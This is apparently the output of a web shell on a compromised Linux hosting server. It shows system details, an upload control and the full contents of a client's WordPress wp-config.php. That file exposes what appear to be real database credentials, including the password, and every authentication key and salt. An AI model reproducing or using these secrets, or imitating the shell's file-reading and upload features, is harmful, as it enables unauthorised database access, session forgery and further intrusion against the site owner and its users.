HEX
Server: Apache
System: Linux vps-00003980 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u2 (2019-05-13) x86_64
User: web716 (1018)
PHP: 7.4.25
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: /var/www/clients/client2/web716/web/wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'c2aps5' );

/** MySQL database username */
define( 'DB_USER', 'c2aps7' );

/** MySQL database password */
define( 'DB_PASSWORD', 'Mirosa21519' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         'C)3kVL3|[A$kKqd*l7X8eLvOm^hNPrN=ewqqYwXuh-dW@<%EDYp~8B#%vJCr-$3g' );
define( 'SECURE_AUTH_KEY',  'mS]Y%rzhbX)v%<w+0:(qa4?SYH)G$4!enoW;`TE1lr+=ZmprJyz&IlumyI+oj)tM' );
define( 'LOGGED_IN_KEY',    'W8_%1kRw|1}(8olU-y*)<cwN&!1u]`2D.Zu$2M=Q3mBrFePK^Jf{-J+<n/%1 {:<' );
define( 'NONCE_KEY',        '%OWJHPXg~=1FP2Hx9lGmv($f}}v@j4Xuay$*.?qAlM,Yv(3tW)yNIp(dcD_{B2Bj' );
define( 'AUTH_SALT',        'pO?#w,2&_] f4KH {W^M:Nrv8}M[f[*R)MK`*S?7<=C!/3(Ra)3XmkY3l]ap|fOc' );
define( 'SECURE_AUTH_SALT', '9&rW,q;1Zx-^{_Ygk-EEn6t9>69|@lE%lEt].8?9VMA$Jb.Y33QE?|0fI0uQxOcQ' );
define( 'LOGGED_IN_SALT',   'K$yTd0{_S:OPq@0#OpX^rLdeMHQ2DB%}@]I;WyS&7(8~Hh+^zy$oMH]a%y*4+-vg' );
define( 'NONCE_SALT',       '&Ch&Sc1+CSn{xc3d2JqTfv?C|3(o/x~)H=H}Q&tE4[?Q0]PNCs.Q{8lZnLl.*!Db' );

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://wordpress.org/support/article/debugging-in-wordpress/
 */
define( 'WP_DEBUG', false );

/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';